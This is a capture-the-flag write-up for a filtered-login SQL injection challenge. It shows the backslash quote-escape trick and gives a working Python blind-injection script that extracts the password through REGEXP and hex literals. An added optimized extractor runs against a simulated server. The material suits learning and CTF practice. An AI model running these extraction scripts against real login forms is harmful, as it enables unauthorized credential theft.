Couldn't focus on reading, so I did a challenge instead.
The challenge gives the query: select * from users where username='' and passwd=''
A quick fuzz shows that most characters and query keywords are filtered.
The backslash \ does get through, though.
Enter a single \ in username so it escapes the closing single quote: the quote becomes part of the username string, and whatever we put in passwd lands directly in the SQL instead of inside a string.
Then use REGEXP in passwd to match the password one character at a time and brute-force it position by position.
exp:

import time
import requests

url = 'http://e516ba55-43db-4235-ac20-ce2fb9919d95.node3.buuoj.cn/index.php'

def str2hex(string):
    # send the regex as a 0x... literal so no quote or letter reaches the filter raw
    return '0x' + ''.join('%02x' % ord(i) for i in string)

def sqli(payload):
    # username='\' escapes the closing quote, so passwd lands straight in the SQL;
    # ';' ends the statement and the trailing NUL truncates whatever follows
    poc = '||passwd/**/REGEXP/**/{};\x00'.format(payload)
    data = {
        'username': '\\',
        'passwd': poc
    }
    a = requests.post(url, data=data, allow_redirects=False)
    if a.status_code == 302:    # regex matched, the login redirect fires
        return payload
    if a.status_code != 200 and a.status_code != 302:    # e.g. 429: back off and retry
        time.sleep(0.5)
        return sqli(payload)
    return ''

# candidate characters: punctuation the filter lets through, then letters and digits
alphabet = ['!','|','[',']','{','}','_','/','-','&','%','#','@'] \
         + list('abcdefghijklmnopqrstuvwxyz') \
         + list('ABCDEFGHIJKLMNOPQRSTUVWXYZ') \
         + list('0123456789')
# these have a meaning inside a regex and must be escaped to match literally
meta = {'|', '[', ']', '{', '}'}
pattern = '^'     # the regex sent to the server, anchored at the start
password = ''     # the recovered plaintext
while True:
    for i in alphabet:
        lit = '\\' + i if i in meta else i
        if sqli(str2hex(pattern + lit)) != '':
            pattern += lit
            password += i
            break
    else:
        break     # nothing matched: end of the value, or a character not in the alphabet
    print(password)
# an anchored match confirms we really reached the end
if sqli(str2hex(pattern + '$')) != '':
    print('done:', password)
else:
    print('stopped early, next character is outside the alphabet:', password)

Since some characters might be filtered, I wrote a small function that converts the pattern to hex before sending it.
This challenge deliberately left the double quote available; it can actually be solved without it too (heads-up: this is a modified version of the original challenge).
The recursion is there purely to deal with 429 responses.
Each recovered character is appended to the function's argument, so going one position at a time it finishes quickly.
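The extraction loop above generalizes beyond a linear scan per position. What follows is an added example, not code from the original post or from the challenge: it rebuilds the injected passwd field exactly as the script does, but runs it against a simulated server with a constructed secret (`SECRET`, `simulated_server`, `recover_password` and `demo` are all assumptions for the offline demo). It escapes regex metacharacters before a candidate goes into the pattern, binary-searches each position with an alternation group instead of trying every character, and uses an anchored `^...$` match to know when the value is complete. It also models one caveat a practitioner should know about this technique: MySQL's REGEXP on a non-binary column is case-insensitive, so a mixed-case alphabet like the one in the script settles on whichever case it happens to try first; `passwd REGEXP BINARY 0x...` is the case-sensitive form, and the demo shows the difference.

```python
import re
import string

# Constructed secret standing in for users.passwd in this offline demo.
# It is NOT the challenge's real value; it deliberately contains regex
# metacharacters so the escaping path is exercised.
SECRET = "Fl4g_{r3G3xp}"

# Characters that mean something in a REGEXP pattern (POSIX ERE and ICU agree)
# and must be backslash-escaped when they are meant literally.
_META = set(r'\.^$*+?()[]{}|')


def regex_escape(ch):
    return '\\' + ch if ch in _META else ch


def to_hex_literal(s):
    """Encode a string as a MySQL 0x... literal (the post's str2hex idea,
    byte-exact via UTF-8), so no quote or keyword is sent as plain text."""
    return '0x' + s.encode('utf-8').hex()


def build_payload(pattern):
    """The passwd field exactly as the post injects it. The lone backslash in
    username has already escaped the closing quote, so this text lands
    directly in the WHERE clause."""
    return '||passwd/**/REGEXP/**/{};\x00'.format(to_hex_literal(pattern))


def simulated_server(payload, case_sensitive=False):
    """Stand-in for the target: True where the real app answered 302.
    MySQL's REGEXP on a non-binary column is case-insensitive; pass
    case_sensitive=True to model `passwd REGEXP BINARY 0x...`."""
    m = re.fullmatch(r'\|\|passwd/\*\*/REGEXP/\*\*/0x([0-9a-f]+);\x00', payload)
    if m is None:
        raise ValueError('payload does not have the expected injection shape')
    pattern = bytes.fromhex(m.group(1)).decode('utf-8')
    flags = 0 if case_sensitive else re.IGNORECASE
    return re.search(pattern, SECRET, flags) is not None


def recover_password(oracle, alphabet, max_len=64):
    """Generic REGEXP-oracle extraction. Instead of trying every character
    (up to len(alphabet) requests per position), each position is binary
    searched with an alternation group, costing about log2(len(alphabet)) + 2
    requests. Returns (recovered_value, request_count)."""
    found = ''
    count = 0

    def ask(pattern):
        nonlocal count
        count += 1
        return oracle(build_payload(pattern))

    for _ in range(max_len):
        prefix = '^' + ''.join(regex_escape(c) for c in found)
        if ask(prefix + '$'):            # anchored match: nothing left to find
            return found, count
        cands = list(alphabet)
        while len(cands) > 1:
            half = cands[:len(cands) // 2]
            group = '(' + '|'.join(regex_escape(c) for c in half) + ')'
            cands = half if ask(prefix + group) else cands[len(cands) // 2:]
        if not ask(prefix + regex_escape(cands[0])):
            raise RuntimeError('character %d is outside the alphabet' % len(found))
        found += cands[0]
    raise RuntimeError('value longer than max_len')


def demo(case_sensitive):
    alphabet = string.ascii_lowercase + string.digits + '_{}'
    if case_sensitive:
        alphabet += string.ascii_uppercase
    return recover_password(lambda p: simulated_server(p, case_sensitive), alphabet)


if __name__ == '__main__':
    print(demo(False))   # case-folded: default REGEXP cannot tell F from f
    print(demo(True))    # exact: what REGEXP BINARY would recover
```

Run directly, the two printed tuples show the case-folded and the exact recovery together with the number of requests each needed. Against a real target only the oracle changes: swap `simulated_server` for the `requests.post` check from the script, which returns truth on a 302.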

After dumping the password I didn't know how to log in... admin is filtered.
Then it hit me: at the moment of the 302 redirect the condition was already satisfied and we were being redirected anyway, so actually logging in would have been pointless.
After a long think I couldn't help myself and went to look at the source on github.

Well played, challenge author.

Off I go, back to studying.

Category: Tech
